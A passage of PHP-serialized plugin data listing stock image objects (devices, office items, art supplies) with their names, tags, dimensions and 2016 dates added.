Knife\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:70;a:12:{s:2:\"id\";s:2:\"77\";s:6:\"handle\";s:23:\"object_applewatch_2.png\";s:4:\"name\";s:17:\"Apple Watch Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:71;a:12:{s:2:\"id\";s:2:\"76\";s:6:\"handle\";s:18:\"object_candy_1.png\";s:4:\"name\";s:13:\"Candy Colored\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:72;a:12:{s:2:\"id\";s:2:\"75\";s:6:\"handle\";s:17:\"object_ipad_1.png\";s:4:\"name\";s:16:\"Apple iPad Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:73;a:12:{s:2:\"id\";s:2:\"74\";s:6:\"handle\";s:17:\"object_lamp_2.png\";s:4:\"name\";s:15:\"Black Desk Lamp\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:74;a:12:{s:2:\"id\";s:2:\"73\";s:6:\"handle\";s:18:\"object_canon_1.png\";s:4:\"name\";s:17:\"Canon Camera DLSR\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:75;a:12:{s:2:\"id\";s:2:\"72\";s:6:\"handle\";s:23:\"object_blackberry_2.png\";s:4:\"name\";s:12:\"Blackberry 3\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:76;a:12:{s:2:\"id\";s:2:\"71\";s:6:\"handle\";s:19:\"object_iphone_2.png\";s:4:\"name\";s:19:\"Apple iPhone Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:77;a:12:{s:2:\"id\";s:2:\"70\";s:6:\"handle\";s:17:\"object_ipad_2.png\";s:4:\"name\";s:15:\"Apple iPad Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:78;a:12:{s:2:\"id\";s:2:\"69\";s:6:\"handle\";s:20:\"object_printer_1.png\";s:4:\"name\";s:7:\"Printer\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:79;a:12:{s:2:\"id\";s:2:\"68\";s:6:\"handle\";s:20:\"object_pcmouse_1.png\";s:4:\"name\";s:14:\"Black PC Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:80;a:12:{s:2:\"id\";s:2:\"67\";s:6:\"handle\";s:17:\"object_ipad_3.png\";s:4:\"name\";s:17:\"Apple iPad Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:81;a:12:{s:2:\"id\";s:2:\"66\";s:6:\"handle\";s:17:\"object_lamp_1.png\";s:4:\"name\";s:13:\"Desk Lamp Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:82;a:12:{s:2:\"id\";s:2:\"65\";s:6:\"handle\";s:22:\"object_macscreen_1.png\";s:4:\"name\";s:16:\"Apple Mac Screen\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:83;a:12:{s:2:\"id\";s:2:\"64\";s:6:\"handle\";s:23:\"object_blackberry_3.png\";s:4:\"name\";s:12:\"Blackberry 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:84;a:12:{s:2:\"id\";s:2:\"63\";s:6:\"handle\";s:23:\"object_applewatch_3.png\";s:4:\"name\";s:16:\"Apple Watch Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:85;a:12:{s:2:\"id\";s:2:\"62\";s:6:\"handle\";s:23:\"object_blackberry_1.png\";s:4:\"name\";s:10:\"Blackberry\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:86;a:12:{s:2:\"id\";s:2:\"49\";s:6:\"handle\";s:19:\"object_bottle_1.png\";s:4:\"name\";s:18:\"Brown Glass Bottle\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:87;a:12:{s:2:\"id\";s:2:\"48\";s:6:\"handle\";s:20:\"object_glasses_1.png\";s:4:\"name\";s:19:\"Hipster Glasses Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:88;a:12:{s:2:\"id\";s:2:\"47\";s:6:\"handle\";s:21:\"object_magazine_1.png\";s:4:\"name\";s:14:\"Blank Magazine\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:89;a:12:{s:2:\"id\";s:2:\"46\";s:6:\"handle\";s:28:\"object_leatherdocument_2.png\";s:4:\"name\";s:24:\"Black Leather Document 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:90;a:12:{s:2:\"id\";s:2:\"45\";s:6:\"handle\";s:18:\"object_purse_2.png\";s:4:\"name\";s:13:\"Black Purse 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:91;a:12:{s:2:\"id\";s:2:\"44\";s:6:\"handle\";s:23:\"object_typewriter_1.png\";s:4:\"name\";s:18:\"Retro Typewriter 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:92;a:12:{s:2:\"id\";s:2:\"43\";s:6:\"handle\";s:17:\"object_book_5.png\";s:4:\"name\";s:9:\"Old Books\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:93;a:12:{s:2:\"id\";s:2:\"42\";s:6:\"handle\";s:28:\"object_leatherdocument_1.png\";s:4:\"name\";s:29:\"Black Leather Document Closed\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:94;a:12:{s:2:\"id\";s:2:\"41\";s:6:\"handle\";s:17:\"object_book_4.png\";s:4:\"name\";s:8:\"Old Book\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:95;a:12:{s:2:\"id\";s:2:\"40\";s:6:\"handle\";s:19:\"object_wallet_2.png\";s:4:\"name\";s:22:\"Black Leather Document\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:96;a:12:{s:2:\"id\";s:2:\"39\";s:6:\"handle\";s:18:\"object_quill_2.png\";s:4:\"name\";s:15:\"Quill Feather 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:97;a:12:{s:2:\"id\";s:2:\"38\";s:6:\"handle\";s:24:\"object_eiffeltower_1.png\";s:4:\"name\";s:11:\"Eiffeltower\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:98;a:12:{s:2:\"id\";s:2:\"37\";s:6:\"handle\";s:21:\"object_magazine_2.png\";s:4:\"name\";s:11:\"Open Book 3\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1333\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:99;a:12:{s:2:\"id\";s:2:\"36\";s:6:\"handle\";s:17:\"object_book_1.png\";s:4:\"name\";s:10:\"Blank Book\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:100;a:12:{s:2:\"id\";s:2:\"35\";s:6:\"handle\";s:20:\"object_glasses_2.png\";s:4:\"name\";s:15:\"Hipster Glasses\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:101;a:12:{s:2:\"id\";s:2:\"34\";s:6:\"handle\";s:17:\"object_book_2.png\";s:4:\"name\";s:11:\"Open Book 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:102;a:12:{s:2:\"id\";s:2:\"33\";s:6:\"handle\";s:19:\"object_gloves_1.png\";s:4:\"name\";s:12:\"Black Gloves\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:103;a:12:{s:2:\"id\";s:2:\"32\";s:6:\"handle\";s:23:\"object_typewriter_2.png\";s:4:\"name\";s:16:\"Retro Typewriter\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:104;a:12:{s:2:\"id\";s:2:\"31\";s:6:\"handle\";s:17:\"object_book_3.png\";s:4:\"name\";s:9:\"Open Book\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:105;a:12:{s:2:\"id\";s:2:\"30\";s:6:\"handle\";s:19:\"object_wallet_1.png\";s:4:\"name\";s:12:\"Black Wallet\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:106;a:12:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:18:\"object_purse_1.png\";s:4:\"name\";s:11:\"Black Purse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:107;a:12:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:18:\"object_quill_1.png\";s:4:\"name\";s:13:\"Quill Feather\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:108;a:12:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:19:\"object_artbox_2.png\";s:4:\"name\";s:16:\"Art Box Colors 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:109;a:12:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:18:\"object_cloth_1.png\";s:4:\"name\";s:17:\"Cloth Paint Color\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:110;a:12:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:21:\"object_brushpot_1.png\";s:4:\"name\";s:9:\"Brush Pot\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"984\";s:6:\"height\";s:3:\"984\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:111;a:12:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:24:\"object_paintbucket_1.png\";s:4:\"name\";s:12:\"Paint Bucket\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 